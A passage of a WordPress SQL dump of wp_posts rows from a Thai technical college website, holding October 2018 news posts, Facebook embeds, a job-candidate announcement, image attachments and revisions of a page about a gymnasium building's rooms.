'%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-8-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%84%e0%b8%93%e0%b8%b0', '', '', '2018-10-10 10:01:06', '2018-10-10 03:01:06', '', 0, 'http://www.technicrayong.ac.th/?p=4098', 274, 'post', '', 0),
(4099, 3, '2018-10-10 10:00:50', '2018-10-10 03:00:50', '', '43372313_689079111468280_8373507590771965952_o', '', 'inherit', 'closed', 'closed', '', '43372313_689079111468280_8373507590771965952_o', '', '', '2018-10-10 10:00:50', '2018-10-10 03:00:50', '', 4098, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/43372313_689079111468280_8373507590771965952_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4100, 3, '2018-10-10 10:01:06', '2018-10-10 03:01:06', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.689191268123731%26type%3D3&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 8 ตุลาคม 2561 คณะผู้บริหารวิทยาลัยสังกัดคณะกรรมการการอาชีวศึกษา หน่วยงานภาครัฐ และเอกชน รวมไปถึงสถานประกอบการ เข้าร่วมประชุมโครงการขึ้นทะเบียนครูพิเศษอาชีวศึกษาอุตสาหกรรม 4.0 และ 10 อุตสาหกรรมในพื้นที่ EEC และเตรียมพร้อมต้อนรับ รัฐมนตรีช่วยว่าการกระทรวงศึกษาธิการ (พลเอก สุรเชษฐ์ ชัยวงศ์) โดยมีท่าน ดร.ธวัชชัย อุ่ยพานิช รองศึกษาธิการภาค 9 และ ว่าที่เรือตรีชูชีพ อรุณเหลือง ประธานคณะกรรมการอาชีวศึกษาจังหวัดระยอง เป็นประธานในพิธี ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4098-revision-v1', '', '', '2018-10-10 10:01:06', '2018-10-10 03:01:06', '', 4098, 'http://www.technicrayong.ac.th/4098-revision-v1/', 0, 'revision', '', 0),
(4101, 3, '2018-10-10 10:05:47', '2018-10-10 03:05:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D689187254790799%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 8 ตุลาคม 2561 วิทยาลัยเทคนิคระยอง นำโดยนางณัฐธารีย์ สิริกุลปัญญาพร รองผู้อำนวยการฝ่ายวิชาการ และฝ่ายบริหารทรัพยากร พร้อมด้วยคณะครู แผนกอาหารและโภชนาการ ร่วมต้อนรับคณะศึกษาดูงาน จากวิทยาลัยเทคนิคสารภี จังหวัดเชียงใหม่ จำนวน 40 ท่าน ณ ร้านอาหาร ใบชะมวง วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-8-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%a7%e0%b8%b4%e0%b8%97', '', '', '2018-10-10 10:05:47', '2018-10-10 03:05:47', '', 0, 'http://www.technicrayong.ac.th/?p=4101', 273, 'post', '', 0),
(4102, 3, '2018-10-10 10:04:31', '2018-10-10 03:04:31', '', '43421431_689187031457488_8469058612969340928_o', '', 'inherit', 'closed', 'closed', '', '43421431_689187031457488_8469058612969340928_o', '', '', '2018-10-10 10:04:31', '2018-10-10 03:04:31', '', 4101, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/43421431_689187031457488_8469058612969340928_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4103, 3, '2018-10-10 10:05:47', '2018-10-10 03:05:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D689187254790799%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ 8 ตุลาคม 2561 วิทยาลัยเทคนิคระยอง นำโดยนางณัฐธารีย์ สิริกุลปัญญาพร รองผู้อำนวยการฝ่ายวิชาการ และฝ่ายบริหารทรัพยากร พร้อมด้วยคณะครู แผนกอาหารและโภชนาการ ร่วมต้อนรับคณะศึกษาดูงาน จากวิทยาลัยเทคนิคสารภี จังหวัดเชียงใหม่ จำนวน 40 ท่าน ณ ร้านอาหาร ใบชะมวง วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4101-revision-v1', '', '', '2018-10-10 10:05:47', '2018-10-10 03:05:47', '', 4101, 'http://www.technicrayong.ac.th/4101-revision-v1/', 0, 'revision', '', 0),
(4104, 3, '2018-10-13 11:06:31', '2018-10-13 04:06:31', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 12 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-3', '', '', '2018-10-13 11:06:31', '2018-10-13 04:06:31', '', 0, 'http://www.technicrayong.ac.th/?p=4104', 272, 'post', '', 0),
(4105, 3, '2018-10-13 11:06:04', '2018-10-13 04:06:04', '', 'ประกาศรายชื่อผู้มีสิทธ์สอบคัดเลือก เป็นลูกจ้างชั่วคราว', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97%e0%b8%98-2', '', '', '2018-10-13 11:06:04', '2018-10-13 04:06:04', '', 4104, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/ประกาศรายชื่อผู้มีสิทธ์สอบคัดเลือก-เป็นลูกจ้างชั่วคราว-.pdf', 0, 'attachment', 'application/pdf', 0),
(4106, 3, '2018-10-13 11:06:31', '2018-10-13 04:06:31', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F10%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน 12 อัตรา', '', 'inherit', 'closed', 'closed', '', '4104-revision-v1', '', '', '2018-10-13 11:06:31', '2018-10-13 04:06:31', '', 4104, 'http://www.technicrayong.ac.th/4104-revision-v1/', 0, 'revision', '', 0),
(4107, 3, '2018-10-17 08:45:48', '2018-10-17 01:45:48', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D691290641247127%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันเสาร์ที่ 13 ตุลาคม 2561 ดร.ภูมิพัฒน์ แก้วมูล รองผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู ร่วมพิธีบำเพ็ญพระราชกุศลและถวายพวงมาลา เนื่องในวันคล้ายวันสวรรคตพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช บรมราชบพิตร ณ สวนศรีเมือง อำเภอเมือง จังหวัดระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-13%e2%80%8b-%e0%b8%95%e0%b8%b8%e0%b8%a5%e0%b8%b2%e0%b8%84%e0%b8%a1%e2%80%8b-2561%e2%80%8b', '', '', '2018-10-17 08:45:48', '2018-10-17 01:45:48', '', 0, 'http://www.technicrayong.ac.th/?p=4107', 271, 'post', '', 0),
(4108, 3, '2018-10-16 10:41:09', '2018-10-16 03:41:09', '', 'DSC_1674', '', 'inherit', 'closed', 'closed', '', 'dsc_1674', '', '', '2018-10-16 10:41:09', '2018-10-16 03:41:09', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1674.jpg', 0, 'attachment', 'image/jpeg', 0),
(4109, 3, '2018-10-17 09:41:30', '2018-10-17 02:41:30', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 </strong></span></h2>\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\n\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\n\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\n\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\n\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\n\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"870\" height=\"489\" />\n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n\n \n<h2></h2>\n \n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 2</strong></span></h2>\n<h2><span style=\"color: #3366ff;\"><strong>จำนวน 4 ห้อง</strong></span></h2>\n<strong><span style=\"color: #800000;\">1.ห้องงานกิจกรรม</span></strong>\n\n<img class=\" wp-image-4125 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1686.jpg\" alt=\"\" width=\"887\" height=\"499\" />\n\n \n\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-autosave-v1', '', '', '2018-10-17 09:41:30', '2018-10-17 02:41:30', '', 4048, 'http://www.technicrayong.ac.th/4048-autosave-v1/', 0, 'revision', '', 0),
(4110, 3, '2018-10-16 10:44:33', '2018-10-16 03:44:33', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-16 10:44:33', '2018-10-16 03:44:33', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4111, 3, '2018-10-16 10:47:02', '2018-10-16 03:47:02', '', 'DSC_1693', '', 'inherit', 'closed', 'closed', '', 'dsc_1693', '', '', '2018-10-16 10:47:02', '2018-10-16 03:47:02', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1693.jpg', 0, 'attachment', 'image/jpeg', 0),
(4112, 3, '2018-10-16 10:48:19', '2018-10-16 03:48:19', '', 'DSC_1679', '', 'inherit', 'closed', 'closed', '', 'dsc_1679', '', '', '2018-10-16 10:48:19', '2018-10-16 03:48:19', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1679.jpg', 0, 'attachment', 'image/jpeg', 0),
(4113, 3, '2018-10-16 10:51:56', '2018-10-16 03:51:56', '', 'DSC_1680', '', 'inherit', 'closed', 'closed', '', 'dsc_1680', '', '', '2018-10-16 10:51:56', '2018-10-16 03:51:56', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1680.jpg', 0, 'attachment', 'image/jpeg', 0),
(4114, 3, '2018-10-16 10:54:15', '2018-10-16 03:54:15', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร จำนวน ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n<img class=\"wp-image-4113 aligncenter\" src=\"/wp-content/uploads/2018/10/DSC_1680.jpg\" alt=\"\" width=\"502\" height=\"283\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-16 10:54:15', '2018-10-16 03:54:15', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4117, 3, '2018-10-16 11:08:31', '2018-10-16 04:08:31', '', 'DSC_1675', '', 'inherit', 'closed', 'closed', '', 'dsc_1675', '', '', '2018-10-16 11:08:31', '2018-10-16 04:08:31', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1675.jpg', 0, 'attachment', 'image/jpeg', 0),
(4118, 3, '2018-10-16 11:09:26', '2018-10-16 04:09:26', '', 'DSC_1678', '', 'inherit', 'closed', 'closed', '', 'dsc_1678', '', '', '2018-10-16 11:09:26', '2018-10-16 04:09:26', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1678.jpg', 0, 'attachment', 'image/jpeg', 0),
(4119, 3, '2018-10-16 11:11:59', '2018-10-16 04:11:59', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร จำนวน ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-16 11:11:59', '2018-10-16 04:11:59', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4120, 3, '2018-10-16 11:22:21', '2018-10-16 04:22:21', '', 'DSC_1681', '', 'inherit', 'closed', 'closed', '', 'dsc_1681', '', '', '2018-10-16 11:22:21', '2018-10-16 04:22:21', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1681.jpg', 0, 'attachment', 'image/jpeg', 0),
(4121, 3, '2018-10-16 11:23:36', '2018-10-16 04:23:36', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร จำนวน ห้อง</strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-16 11:23:36', '2018-10-16 04:23:36', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4122, 3, '2018-10-16 13:16:42', '2018-10-16 06:16:42', '', 'DSC_1683', '', 'inherit', 'closed', 'closed', '', 'dsc_1683', '', '', '2018-10-16 13:16:42', '2018-10-16 06:16:42', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1683.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4123, 3, '2018-10-16 13:19:42', '2018-10-16 06:19:42', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 จำนวน </strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม<img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว (สำนักงานองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\" wp-image-4111 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1693.jpg\" alt=\"\" width=\"657\" height=\"370\" /><img class=\"wp-image-4112 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1679.jpg\" alt=\"\" width=\"209\" height=\"371\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">3.ห้องแหลมหญ้า (ห้องประชุมองค์การวิชาชีพฯ)</span></strong>\r\n\r\n<img class=\"wp-image-4117 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1675.jpg\" alt=\"\" width=\"655\" height=\"369\" />\r\n\r\n<img class=\" wp-image-4118 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1678.jpg\" alt=\"\" width=\"208\" height=\"369\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">4.ห้องพยาบาล</span></strong>\r\n\r\n<img class=\"wp-image-4120 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1681.jpg\" alt=\"\" width=\"882\" height=\"497\" />\r\n\r\n \r\n\r\n ', 'อาคารโรงยิม', '', 'inherit', 'closed', 'closed', '', '4048-revision-v1', '', '', '2018-10-16 13:19:42', '2018-10-16 06:19:42', '', 4048, 'http://www.technicrayong.ac.th/4048-revision-v1/', 0, 'revision', '', 0),
(4124, 3, '2018-10-16 13:21:57', '2018-10-16 06:21:57', '', 'Picture 165', '', 'inherit', 'closed', 'closed', '', 'picture-165', '', '', '2018-10-16 13:21:57', '2018-10-16 06:21:57', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/Picture-165.jpg', 0, 'attachment', 'image/jpeg', 0),
(4125, 3, '2018-10-16 13:26:31', '2018-10-16 06:26:31', '', 'DSC_1686', '', 'inherit', 'closed', 'closed', '', 'dsc_1686', '', '', '2018-10-16 13:26:31', '2018-10-16 06:26:31', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1686.jpg', 0, 'attachment', 'image/jpeg', 0),
(4126, 3, '2018-10-16 13:27:54', '2018-10-16 06:27:54', '', 'DSC_1689', '', 'inherit', 'closed', 'closed', '', 'dsc_1689', '', '', '2018-10-16 13:27:54', '2018-10-16 06:27:54', '', 4048, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/DSC_1689.jpg', 0, 'attachment', 'image/jpeg', 0),
(4127, 3, '2018-10-16 15:43:59', '2018-10-16 08:43:59', '<h2><span style=\"color: #3366ff;\"><strong>บริเวรด้านหน้าอาคาร</strong></span></h2>\r\n<img class=\"wp-image-4108 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1674-300x169.jpg\" alt=\"\" width=\"461\" height=\"260\" /><img class=\"wp-image-4049 alignleft\" src=\"/wp-content/uploads/2018/10/DSC00705-1024x683.jpg\" alt=\"\" width=\"390\" height=\"260\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #3366ff;\"><strong>บริเวรภายในอาคาร ชั้น 1 จำนวน </strong></span></h2>\r\n<strong><span style=\"color: #800000;\">1.สนามยิมเนเซียม</span></strong>\r\n\r\n<strong><span style=\"color: #800000;\"><img class=\" wp-image-4122 alignleft\" src=\"/wp-content/uploads/2018/10/DSC_1683.jpg\" alt=\"\" width=\"881\" height=\"496\" /></span></strong>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<strong><span style=\"color: #800000;\">2.ห้องเกาะแก้ว 